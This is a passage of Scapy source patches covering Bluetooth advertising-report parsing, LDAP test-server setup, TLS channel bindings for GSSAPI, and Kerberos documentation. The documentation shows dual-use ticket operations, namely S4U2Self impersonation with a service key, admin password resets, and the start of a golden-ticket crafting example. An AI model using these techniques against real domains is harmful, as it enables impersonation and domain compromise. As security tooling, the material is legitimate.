HCI_Command_Hdr, type=1) @@ -2661,6 +2724,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Advertising_Reports, event=0x02) bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Connection_Update_Complete, event=0x03) bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Long_Term_Key_Request, event=0x05) +bind_layers(HCI_Event_LE_Meta, HCI_LE_Meta_Extended_Advertising_Reports, event=0x0d) bind_layers(EIR_Hdr, EIR_Flags, type=0x01) bind_layers(EIR_Hdr, EIR_IncompleteList16BitServiceUUIDs, type=0x02) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 0fb23b1ef20..7ca5c7ca264 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -709,6 +709,59 @@ assert b[EIR_CompleteList128BitServiceUUIDs].svc_uuids[0] == UUID("01234567-89ab assert a.summary() == "HCI Event / HCI_Event_Hdr / HCI_Event_LE_Meta / HCI_LE_Meta_Advertising_Reports" += EIR_Hdr - HCI_LE_Meta_Extended_Advertising_Report +a = HCI_Hdr()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_LE_Meta_Extended_Advertising_Reports(reports=[ + HCI_LE_Meta_Extended_Advertising_Report( + #event_type = 0x0012, + scannable = 1, + legacy = 1, + address_type = 0x01, + address="a1:b2:c3:d4:e5:f6", + primary_phy = 1, + rssi = -85, + data=[ + EIR_Hdr()/EIR_CompleteList16BitServiceUUIDs( + svc_uuids = [0xffff], + ), + EIR_Hdr()/EIR_ServiceData16BitUUID( + svc_uuid = 0xffff + )/Raw(b"scapy\x00\x00\x00") + ] + ), + HCI_LE_Meta_Extended_Advertising_Report( + #event_type = 0x001a, + scannable = 1, + scan_response = 1, + legacy = 1, + address_type = 0x01, + address="a1:b2:c3:d4:e5:f6", + primary_phy = 1, + rssi = -85, + data=[ + EIR_Hdr()/EIR_Manufacturer_Specific_Data( + company_id = 0xffff, + ) / Raw(b"scapy\x00\x01\x02\x03\x04") + ] + ), +]) + +assert raw(a) == b"\x04\x3e\x50\x0d\x02\x12\x00\x01\xf6\xe5\xd4\xc3\xb2\xa1\x01\x00\xff\x7f\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x03\x03\xff\xff\x0b\x16\xff\xffscapy\x00\x00\x00\x1a\x00\x01\xf6\xe5\xd4\xc3\xb2\xa1\x01\x00\xff\x7f\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x0d\xff\xff\xffscapy\x00\x01\x02\x03\x04" + +b = HCI_Hdr(raw(a)) +b.show() +assert b[HCI_Event_Hdr].len > 0 +assert b[HCI_LE_Meta_Extended_Advertising_Reports].num_reports == 2 +assert b[HCI_LE_Meta_Extended_Advertising_Report][0].address == "a1:b2:c3:d4:e5:f6" +assert b[HCI_LE_Meta_Extended_Advertising_Report][0].tx_power == 0x7f +assert b[HCI_LE_Meta_Extended_Advertising_Report][0].rssi == -85 +assert b[HCI_LE_Meta_Extended_Advertising_Report][0].data_length > 0 +assert b[EIR_CompleteList16BitServiceUUIDs].svc_uuids == [0xffff] +assert b[EIR_ServiceData16BitUUID].svc_uuid == 0xffff +assert raw(b[EIR_ServiceData16BitUUID].payload) == b"scapy\x00\x00\x00" +assert b[EIR_Manufacturer_Specific_Data].company_id == 0xffff +assert raw(b[EIR_Manufacturer_Specific_Data].payload) == b"scapy\x00\x01\x02\x03\x04" + + = ATT_Hdr - misc a = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/ATT_Hdr()/ATT_Read_By_Type_Request_128bit(uuid1=0xa14, uuid2=0xa24) a = HCI_Hdr(raw(a)) From f8f35a65cf2b6b75e901c2fe09098cbff536e4f9 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 21 Apr 2025 23:43:36 +0200 Subject: [PATCH 1462/1632] Add channel binding support in SSPs (#4723) * Implement channel bindings * Hotpatch kerberos doc. More to come later * Try to fix LDAP test --- .config/ci/install.sh | 7 +- .config/ci/openldap-testdata.ldif | 146 ------------------------- .config/ci/openldap/config.ldif | 31 ++++++ .config/ci/openldap/install.sh | 44 ++++++++ .config/ci/openldap/testdata.ldif | 66 ++++++++++++ doc/scapy/layers/kerberos.rst | 111 ++++++++++--------- scapy/layers/gssapi.py | 148 ++++++++++++++++++++++++-- scapy/layers/http.py | 45 ++++++-- scapy/layers/kerberos.py | 164 ++++++++++++++++++++--------- scapy/layers/ldap.py | 124 ++++++++++++++++------ scapy/layers/msrpce/msnrpc.py | 14 ++- scapy/layers/msrpce/rpcclient.py | 6 +- scapy/layers/ntlm.py | 83 +++++++++++---- scapy/layers/smb2.py | 3 + scapy/layers/smbclient.py | 5 +- scapy/layers/spnego.py | 77 +++++++++++--- scapy/layers/tls/cert.py | 9 ++ test/scapy/layers/http.uts | 48 +++++++-- test/scapy/layers/ldapopenldap.uts | 10 ++ 19 files changed, 792 insertions(+), 349 deletions(-) delete mode 100644 .config/ci/openldap-testdata.ldif create mode 100644 .config/ci/openldap/config.ldif create mode 100755 .config/ci/openldap/install.sh create mode 100644 .config/ci/openldap/testdata.ldif diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 716e6892309..61f66837648 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -37,12 +37,7 @@ then sudo apt-get -qy install can-utils || exit 1 sudo apt-get -qy install linux-modules-extra-$(uname -r) || exit 1 sudo apt-get -qy install samba smbclient - # For OpenLDAP, we need to pre-populate some setup questions - sudo debconf-set-selections <<< 'slapd slapd/password2 password Bonjour1' - sudo debconf-set-selections <<< 'slapd slapd/password1 password Bonjour1' - sudo debconf-set-selections <<< 'slapd slapd/domain string scapy.net' - sudo apt-get -qy install slapd - ldapadd -D "cn=admin,dc=scapy,dc=net" -w Bonjour1 -f $CUR/openldap-testdata.ldif -c + sudo bash $CUR/openldap/install.sh # Make sure libpcap is installed if [ ! -z $SCAPY_USE_LIBPCAP ] then diff --git a/.config/ci/openldap-testdata.ldif b/.config/ci/openldap-testdata.ldif deleted file mode 100644 index 56a429afef2..00000000000 --- a/.config/ci/openldap-testdata.ldif +++ /dev/null @@ -1,146 +0,0 @@ -# SPDX-License-Identifier: OLDAP-2.8 -# This file is https://git.openldap.org/openldap/openldap/-/blob/master/tests/data/ppolicy.ldif?ref_type=heads -# (renamed to dc=scapy, dc=net) - -dn: dc=scapy, dc=net -objectClass: top -objectClass: organization -objectClass: dcObject -o: Scapy -dc: scapy - -dn: ou=People, dc=scapy, dc=net -objectClass: top -objectClass: organizationalUnit -ou: People - -dn: ou=Groups, dc=scapy, dc=net -objectClass: organizationalUnit -ou: Groups - -dn: cn=Policy Group, ou=Groups, dc=scapy, dc=net -objectClass: groupOfNames -cn: Policy Group -member: uid=nd, ou=People, dc=scapy, dc=net -owner: uid=ndadmin, ou=People, dc=scapy, dc=net - -dn: cn=Test Group, ou=Groups, dc=scapy, dc=net -objectClass: groupOfNames -cn: Policy Group -member: uid=another, ou=People, dc=scapy, dc=net - -dn: ou=Policies, dc=scapy, dc=net -objectClass: top -objectClass: organizationalUnit -ou: Policies - -dn: cn=Standard Policy, ou=Policies, dc=scapy, dc=net -objectClass: top -objectClass: device -objectClass: pwdPolicy -cn: Standard Policy -pwdAttribute: 2.5.4.35 -pwdLockoutDuration: 15 -pwdInHistory: 6 -pwdCheckQuality: 2 -pwdExpireWarning: 10 -pwdMaxAge: 30 -pwdMinLength: 5 -pwdMaxLength: 13 -pwdGraceAuthnLimit: 3 -pwdAllowUserChange: TRUE -pwdMustChange: TRUE -pwdMaxFailure: 3 -pwdFailureCountInterval: 120 -pwdSafeModify: TRUE -pwdLockout: TRUE - -dn: cn=Idle Expiration Policy, ou=Policies, dc=scapy, dc=net -objectClass: top -objectClass: device -objectClass: pwdPolicy -cn: Idle Expiration Policy -pwdAttribute: 2.5.4.35 -pwdLockoutDuration: 15 -pwdInHistory: 6 -pwdCheckQuality: 2 -pwdExpireWarning: 10 -pwdMaxIdle: 15 -pwdMinLength: 5 -pwdMaxLength: 13 -pwdGraceAuthnLimit: 3 -pwdAllowUserChange: TRUE -pwdMustChange: TRUE -pwdMaxFailure: 3 -pwdFailureCountInterval: 120 -pwdSafeModify: TRUE -pwdLockout: TRUE - -dn: cn=Stricter Policy, ou=Policies, dc=scapy, dc=net -objectClass: top -objectClass: device -objectClass: pwdPolicy -cn: Stricter Policy -pwdAttribute: 2.5.4.35 -pwdLockoutDuration: 15 -pwdInHistory: 6 -pwdCheckQuality: 2 -pwdExpireWarning: 10 -pwdMaxAge: 15 -pwdMinLength: 5 -pwdMaxLength: 13 -pwdAllowUserChange: TRUE -pwdMustChange: TRUE -pwdMaxFailure: 3 -pwdFailureCountInterval: 120 -pwdSafeModify: TRUE -pwdLockout: TRUE - -dn: cn=Another Policy, ou=Policies, dc=scapy, dc=net -objectClass: top -objectClass: device -objectClass: pwdPolicy -cn: Test Policy -pwdAttribute: 2.5.4.35 - -dn: uid=nd, ou=People, dc=scapy, dc=net -objectClass: top -objectClass: person -objectClass: inetOrgPerson -cn: Neil Dunbar -uid: nd -sn: Dunbar -givenName: Neil -userPassword: testpassword - -dn: uid=ndadmin, ou=People, dc=scapy, dc=net -objectClass: top -objectClass: person -objectClass: inetOrgPerson -cn: Neil Dunbar (Admin) -uid: ndadmin -sn: Dunbar -givenName: Neil -userPassword: testpw - -dn: uid=test, ou=People, dc=scapy, dc=net -objectClass: top -objectClass: person -objectClass: inetOrgPerson -cn: test test -uid: test -sn: Test -givenName: Test -userPassword: kfhgkjhfdgkfd -pwdPolicySubEntry: cn=No Policy, ou=Policies, dc=scapy, dc=net - -dn: uid=another, ou=People, dc=scapy, dc=net -objectClass: top -objectClass: person -objectClass: inetOrgPerson -cn: Another Test -uid: another -sn: Test -givenName: Another -userPassword: testing - diff --git a/.config/ci/openldap/config.ldif b/.config/ci/openldap/config.ldif new file mode 100644 index 00000000000..48df480744c --- /dev/null +++ b/.config/ci/openldap/config.ldif @@ -0,0 +1,31 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy + +# Contains the configuration of our OpenLDAP test server + +# Configure LDAPS +dn: cn=config +changetype: modify +add: olcTLSCACertificateFile +olcTLSCACertificateFile: {{CAFILE}} + +dn: cn=config +changetype: modify +replace: olcTLSCertificateKeyFile +olcTLSCertificateKeyFile: {{KEYFILE}} + +dn: cn=config +changetype: modify +replace: olcTLSCertificateFile +olcTLSCertificateFile: {{CRTFILE}} + +dn: cn=config +changetype: modify +add: olcTLSVerifyClient +olcTLSVerifyClient: never + +# Set channel bindings to 'tls-endpoint', like it would be on Windows +dn: cn=config +changetype: modify +replace: olcSaslCbinding +olcSaslCbinding: tls-endpoint diff --git a/.config/ci/openldap/install.sh b/.config/ci/openldap/install.sh new file mode 100755 index 00000000000..cbc8870fc8a --- /dev/null +++ b/.config/ci/openldap/install.sh @@ -0,0 +1,44 @@ +#!/bin/bash + +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# Install an OpenLDAP test server + +# Pre-populate some setup questions +sudo debconf-set-selections <<< 'slapd slapd/password2 password Bonjour1' +sudo debconf-set-selections <<< 'slapd slapd/password1 password Bonjour1' +sudo debconf-set-selections <<< 'slapd slapd/domain string scapy.net' + +# Run setup +sudo apt-get -qy install slapd + +# Enable LDAPs +echo "Enabling HTTPS on slapd..." +sudo sed -i '/^SLAPD_SERVICES/ c\SLAPD_SERVICES="ldap:/// ldapi:/// ldaps://"' /etc/default/slapd +sudo systemctl restart slapd + +# Calculate the paths we're going to need. +CUR=$( cd "$(dirname "${BASH_SOURCE[0]}")" ; pwd -P ) +PKIPATH=$(realpath "$CUR/../../../test/scapy/layers/tls/pki") +OLDAPPATH=$(mktemp -d -t scapy_openldap_XXXX) + +# Copy certificates to temp path +cp ${PKIPATH}/ca_cert.pem ${OLDAPPATH} +cp ${PKIPATH}/srv_cert.pem ${OLDAPPATH} +cp ${PKIPATH}/srv_key.pem ${OLDAPPATH} +chmod a+rx -R ${OLDAPPATH} + +# Copy config template and replace variables. +echo "Creating OpenLDAP config..." +openldap_conf=${OLDAPPATH}/openldap_config.ldif +cp $CUR/config.ldif $openldap_conf +sed -i "s@{{CAFILE}}@${OLDAPPATH}/ca_cert.pem@g" $openldap_conf +sed -i "s@{{CRTFILE}}@${OLDAPPATH}/srv_cert.pem@g" $openldap_conf +sed -i "s@{{KEYFILE}}@${OLDAPPATH}/srv_key.pem@g" $openldap_conf + +echo "Applying OpenLDAP config..." +sudo ldapmodify -Y EXTERNAL -H "ldapi:///" -w Bonjour1 -f $openldap_conf -c +echo "Adding initial dummy data..." +sudo ldapadd -D "cn=admin,dc=scapy,dc=net" -w Bonjour1 -H "ldapi:///" -f $CUR/testdata.ldif -c diff --git a/.config/ci/openldap/testdata.ldif b/.config/ci/openldap/testdata.ldif new file mode 100644 index 00000000000..63c150b4b64 --- /dev/null +++ b/.config/ci/openldap/testdata.ldif @@ -0,0 +1,66 @@ +# SPDX-License-Identifier: OLDAP-2.8 +# This file is based on https://git.openldap.org/openldap/openldap/-/blob/master/tests/data/ppolicy.ldif?ref_type=heads +# (renamed to dc=scapy, dc=net) + +dn: dc=scapy, dc=net +objectClass: top +objectClass: organization +objectClass: dcObject +o: Scapy +dc: scapy + +dn: ou=People, dc=scapy, dc=net +objectClass: top +objectClass: organizationalUnit +ou: People + +dn: ou=Groups, dc=scapy, dc=net +objectClass: organizationalUnit +ou: Groups + +dn: cn=Policy Group, ou=Groups, dc=scapy, dc=net +objectClass: groupOfNames +cn: Policy Group +member: uid=nd, ou=People, dc=scapy, dc=net +owner: uid=ndadmin, ou=People, dc=scapy, dc=net + +dn: cn=Test Group, ou=Groups, dc=scapy, dc=net +objectClass: groupOfNames +cn: Policy Group +member: uid=another, ou=People, dc=scapy, dc=net + +dn: ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: organizationalUnit +ou: Policies + +dn: uid=nd, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Neil Dunbar +uid: nd +sn: Dunbar +givenName: Neil +userPassword: testpassword + +dn: uid=ndadmin, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Neil Dunbar (Admin) +uid: ndadmin +sn: Dunbar +givenName: Neil +userPassword: testpw + +dn: uid=another, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Another Test +uid: another +sn: Test +givenName: Another +userPassword: testing + diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index c53af5d317c..a6427f395fe 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -1,21 +1,37 @@ Kerberos ======== -.. note:: Kerberos per `RFC4120 `_ + `RFC6113 `_ (FAST) +.. note:: Kerberos per `RFC4120 `_ + `RFC6113 `_ (FAST) + `[MS-KILE] `_ (Windows) High-Level __________ +Scapy provides several high-level utilities related to Kerberos: + +- ``Ticketer``: a module that allows manipulating Kerberos tickets: + - Request TGT/ST + - Generate a ``KerberosSSP`` from a ST + - Renew tickets + - Read, create, write **ccache** files + - Read, create, write **keytab** files + - Kerberos armoring (via FAST) is available + - S4U2Self / S4U2Proxy are implemented + - KPasswd is implemented +- ``KerberosSSP``: an implementation of a GSSAPI SSP for Kerberos, usable in any of Scapy's client that support GSSAPI. + - Encryption/MIC using GSSAPI is available + - Channel bindings are supported + - U2U (User-To-User) is fully supported + - [MS-KKDCP] (KDC proxy) is supported + Ticketer module ~~~~~~~~~~~~~~~ -Scapy implements a **Ticketer** module, in order to manipulate Kerberos tickets. -Ticketer++ is easy to use programmatically, and allows you to manipulate the tickets yourself. -Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], meaning you can edit ANY field in a ticket to your likings. +The **Ticketer** module can be used both from the CLI or programmatically. This section tries to give many usage examples of features +that are available. For more detail regarding the parameters of the functions, it is encouraged to have a look at their docstrings. -- **Request TGT/ST**: +- **Request TGT**: -.. code:: +.. code:: pycon >>> load_module("ticketer") >>> t = Ticketer() @@ -24,22 +40,15 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m >>> t.show() Tickets: 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - >>> t.request_st(0, "host/dc1.domain.local") - >>> t.show() - Tickets: - 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL Start time End time Renew until Auth time 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 -- **Renew TGT/ST**: Scapy's ticketer can be used to renew TGT or ST. +- **Then request a ST, using the TGT**: -.. code:: +.. code:: pycon - >>> load_module("ticketer") - >>> t = Ticketer() - >>> t.request_tgt("Administrator@DOMAIN.LOCAL") - Enter password: ************ + >>> # The TGT we just got has an ID of 0 >>> t.request_st(0, "host/dc1.domain.local") >>> t.show() Tickets: @@ -50,8 +59,7 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL Start time End time Renew until Auth time 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 - >>> t.renew(0) # renew TGT - >>> t.renew(1) # renew ST + - **Use ticket as SSP**: the ``.ssp()`` function. @@ -60,38 +68,14 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m >>> # We use ticket 1 from the above store. >>> smbclient("dc1.domain.local", ssp=t.ssp(1)) -- **Perform S4U2Self** - -.. code:: pycon - - >>> load_module("ticketer") - >>> t = Ticketer() - >>> t.request_tgt("SERVER1$@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) - >>> t.request_st(0, "host/SERVER1", for_user="Administrator@domain.local") - >>> t.show() - CCache tickets: - 0. SERVER1$@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - canonicalize+pre-authent+initial+renewable+forwardable - Start time End time Renew until Auth time - 15/04/25 20:15:17 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 - - 1. Administrator@domain.local -> host/SERVER1@DOMAIN.LOCAL - canonicalize+pre-authent+renewable+forwardable - Start time End time Renew until Auth time - 15/04/25 20:15:20 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 +- **Renew a TGT or ST**: -- **Change password using kpasswd in 'set' mode:** - -.. code:: pycon +.. code:: - >>> t = Ticketer() - >>> t.request_tgt("Administrator@domain.local") - Enter password: ************ - >>> t.kpasswdset(0, "SERVER1$@domain.local") - INFO: Using 'Set Password' mode. This only works with admin privileges. - Enter NEW password: *********** + >>> t.renew(0) # renew TGT + >>> t.renew(1) # renew ST. Works only with 'host/' SPNs -- **Import tickets** +- **Import tickets from a ccache**: .. note:: We first added a realm ``DOMAIN.LOCAL`` with a kdc to ``/etc/krb5.conf`` @@ -109,7 +93,7 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m Start time End time Renew until Auth time 31/08/23 12:08:15 31/08/23 22:08:15 01/09/23 12:08:12 31/08/23 12:08:15 -- **Export tickets** +- **Export tickets into a ccache**: .. code:: pycon @@ -126,6 +110,26 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m 08/31/2023 12:08:15 08/31/2023 23:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL renew until 09/01/2023 12:08:12 +- **Perform S4U2Self** + +.. code:: pycon + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("SERVER1$@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) + >>> t.request_st(0, "host/SERVER1", for_user="Administrator@domain.local") + >>> t.show() + CCache tickets: + 0. SERVER1$@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + canonicalize+pre-authent+initial+renewable+forwardable + Start time End time Renew until Auth time + 15/04/25 20:15:17 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 + + 1. Administrator@domain.local -> host/SERVER1@DOMAIN.LOCAL + canonicalize+pre-authent+renewable+forwardable + Start time End time Renew until Auth time + 15/04/25 20:15:20 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 + - **Load and use keytab for client** .. code:: pycon @@ -174,6 +178,17 @@ Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], m No tickets in CCache. +- **Change password using kpasswd in 'set' mode:** + +.. code:: pycon + + >>> t = Ticketer() + >>> t.request_tgt("Administrator@domain.local") + Enter password: ************ + >>> t.kpasswdset(0, "SERVER1$@domain.local") + INFO: Using 'Set Password' mode. This only works with admin privileges. + Enter NEW password: *********** + - **Craft tickets**: We can start by showing how to craft a **golden ticket**: .. code:: pycon diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 5843047189b..8ed45368b7e 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -10,6 +10,7 @@ - GSSAPI: RFC4121 / RFC2743 - GSSAPI C bindings: RFC2744 + - Channel Bindings for TLS: RFC5929 This is implemented in the following SSPs: @@ -26,7 +27,7 @@ import abc from dataclasses import dataclass -from enum import IntEnum, IntFlag +from enum import Enum, IntEnum, IntFlag from scapy.asn1.asn1 import ( ASN1_SEQUENCE, @@ -41,6 +42,7 @@ ASN1F_SEQUENCE, ) from scapy.asn1packet import ASN1_Packet +from scapy.error import log_runtime from scapy.fields import ( FieldLenField, LEIntEnumField, @@ -156,6 +158,7 @@ class _GSSAPI_Field(PacketField): PacketField that contains a GSSAPI_BLOB_SIGNATURE, but one that can have a payload when not encrypted. """ + __slots__ = ["pay_cls"] def __init__(self, name, pay_cls): @@ -174,6 +177,12 @@ def getfield(self, pkt, s): return remain, val +# RFC2744 Annex A, Null values + +GSS_C_QOP_DEFAULT = 0 +GSS_C_NO_CHANNEL_BINDINGS = b"\x00" + + # RFC2744 sect 3.9 - Status Values GSS_S_COMPLETE = 0 @@ -256,6 +265,18 @@ def getfield(self, pkt, s): # GSS Structures +class ChannelBindingType(Enum): + """ + Channel Binding Application Data types, per: + RFC 5929 / RFC 9266 + """ + + TLS_UNIQUE = "unique" + TLS_SERVER_END_POINT = "tls-server-end-point" + TLS_UNIQUE_FOR_TELNET = "tls-unique-for-telnet" + TLS_EXPORTER = "tls-exporter" # RFC9266 + + class GssBufferDesc(Packet): name = "gss_buffer_desc" fields_desc = [ @@ -277,6 +298,72 @@ class GssChannelBindings(Packet): PacketField("application_data", None, GssBufferDesc), ] + def digestMD5(self): + """ + Calculate a MD5 hash of the channel binding + """ + from scapy.layers.tls.crypto.hash import Hash_MD5 + + return Hash_MD5().digest(bytes(self)) + + @classmethod + def fromssl( + cls, + token_type: ChannelBindingType, + sslsock=None, + certfile=None, + ) -> "GssChannelBindings": + """ + Build a GssChannelBindings struct from a socket + + :param token_type: the type from ChannelBindingType, per RFC5929 + :param sslsock: take the certificate from the the socket.socket object + :param certfile: take the certificate from a file + """ + from scapy.layers.tls.cert import Cert + from cryptography.hazmat.primitives import hashes + + if token_type == ChannelBindingType.TLS_SERVER_END_POINT: + # RFC5929 sect 4 + try: + # Parse certificate + if certfile is not None: + cert = Cert(certfile) + else: + cert = Cert(sslsock.getpeercert(binary_form=True)) + except Exception: + # We failed to parse the certificate. + log_runtime.warning("Failed to parse the SSL Certificate. CBT not used") + return GSS_C_NO_CHANNEL_BINDINGS + try: + h = cert.getSignatureHash() + except Exception: + # We failed to get the signature algorithm. + log_runtime.warning( + "Failed to get the Certificate signature algorithm. CBT not used" + ) + return GSS_C_NO_CHANNEL_BINDINGS + # RFC5929 sect 4.1 + if h == hashes.MD5 or h == hashes.SHA1: + h = hashes.SHA256 + # Calc hash of certificate + digest = hashes.Hash(h) + digest.update(bytes(cert.x509Cert)) + cbdata = digest.finalize() + elif token_type == ChannelBindingType.TLS_UNIQUE: + # RFC5929 sect 3 + cbdata = sslsock.get_channel_binding(cb_type="tls-unique") + else: + raise NotImplementedError + # RFC5056 sect 2.1 + # "channel bindings MUST start with the channel binding unique prefix followed + # by a colon (ASCII 0x3A)." + return GssChannelBindings( + application_data=GssBufferDesc( + value=token_type.value.encode() + b":" + cbdata + ) + ) + # --- The base GSSAPI SSP base class @@ -298,6 +385,14 @@ class GSS_C_FLAGS(IntFlag): GSS_C_EXTENDED_ERROR_FLAG = 0x4000 +class GSS_S_FLAGS(IntFlag): + """ + Equivalent to Microsoft's ASC_REQ* Flags in AcceptSecurityContext + """ + + GSS_S_ALLOW_MISSING_BINDINGS = 0x10000000 + + class SSP: """ The general SSP class @@ -319,7 +414,7 @@ class CONTEXT: __slots__ = ["state", "_flags", "passive"] - def __init__(self, req_flags: Optional[GSS_C_FLAGS] = None): + def __init__(self, req_flags: Optional['GSS_C_FLAGS | GSS_S_FLAGS'] = None): if req_flags is None: # Default req_flags = ( @@ -353,7 +448,11 @@ class STATE(IntEnum): @abc.abstractmethod def GSS_Init_sec_context( - self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_C_FLAGS] = None, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): """ GSS_Init_sec_context: client-side call for the SSP @@ -361,7 +460,13 @@ def GSS_Init_sec_context( raise NotImplementedError @abc.abstractmethod - def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): + def GSS_Accept_sec_context( + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): """ GSS_Accept_sec_context: server-side call for the SSP """ @@ -370,7 +475,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # Passive @abc.abstractmethod - def GSS_Passive(self, Context: CONTEXT, val=None): + def GSS_Passive(self, Context: CONTEXT, token=None): """ GSS_Passive: client/server call for the SSP in passive mode """ @@ -392,7 +497,10 @@ class WRAP_MSG: @abc.abstractmethod def GSS_WrapEx( - self, Context: CONTEXT, msgs: List[WRAP_MSG], qop_req: int = 0 + self, + Context: CONTEXT, + msgs: List[WRAP_MSG], + qop_req: int = GSS_C_QOP_DEFAULT, ) -> Tuple[List[WRAP_MSG], Any]: """ GSS_WrapEx @@ -426,7 +534,10 @@ class MIC_MSG: @abc.abstractmethod def GSS_GetMICEx( - self, Context: CONTEXT, msgs: List[MIC_MSG], qop_req: int = 0 + self, + Context: CONTEXT, + msgs: List[MIC_MSG], + qop_req: int = GSS_C_QOP_DEFAULT, ) -> Any: """ GSS_GetMICEx @@ -440,7 +551,12 @@ def GSS_GetMICEx( raise NotImplementedError @abc.abstractmethod - def GSS_VerifyMICEx(self, Context: CONTEXT, msgs: List[MIC_MSG], signature) -> None: + def GSS_VerifyMICEx( + self, + Context: CONTEXT, + msgs: List[MIC_MSG], + signature, + ) -> None: """ :param Context: the SSP context :param msgs: list of VERIF_MSG @@ -464,7 +580,12 @@ def MaximumSignatureLength(self, Context: CONTEXT): # sect 2.3.1 - def GSS_GetMIC(self, Context: CONTEXT, message: bytes, qop_req: int = 0): + def GSS_GetMIC( + self, + Context: CONTEXT, + message: bytes, + qop_req: int = GSS_C_QOP_DEFAULT, + ): return self.GSS_GetMICEx( Context, [ @@ -478,7 +599,12 @@ def GSS_GetMIC(self, Context: CONTEXT, message: bytes, qop_req: int = 0): # sect 2.3.2 - def GSS_VerifyMIC(self, Context: CONTEXT, message: bytes, signature): + def GSS_VerifyMIC( + self, + Context: CONTEXT, + message: bytes, + signature, + ): self.GSS_VerifyMICEx( Context, [ @@ -497,7 +623,7 @@ def GSS_Wrap( Context: CONTEXT, input_message: bytes, conf_req_flag: bool, - qop_req: int = 0, + qop_req: int = GSS_C_QOP_DEFAULT, ): _msgs, signature = self.GSS_WrapEx( Context, diff --git a/scapy/layers/http.py b/scapy/layers/http.py index f8a74e7b2b3..b43d096924f 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -70,10 +70,14 @@ from scapy.utils import get_temp_file, ContextManagerSubprocess from scapy.layers.gssapi import ( + ChannelBindingType, + GSSAPI_BLOB, + GSS_C_NO_CHANNEL_BINDINGS, GSS_S_COMPLETE, - GSS_S_FAILURE, GSS_S_CONTINUE_NEEDED, - GSSAPI_BLOB, + GSS_S_FAILURE, + GSS_S_FLAGS, + GssChannelBindings, ) from scapy.layers.inet import TCP @@ -758,6 +762,7 @@ class HTTP_Client(object): :param mech: one of HTTP_AUTH_MECHS :param ssl: whether to use HTTPS or not :param ssp: the SSP object to use for binding + :param no_check_certificate: with SSL, do not check the certificate """ def __init__( @@ -776,6 +781,7 @@ def __init__( self.ssp = ssp self.sspcontext = None self.no_check_certificate = no_check_certificate + self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): # Get the port @@ -817,6 +823,12 @@ def _connect_or_reuse(self, host, port=None, tls=False, timeout=5): else: context = self.sslcontext sock = 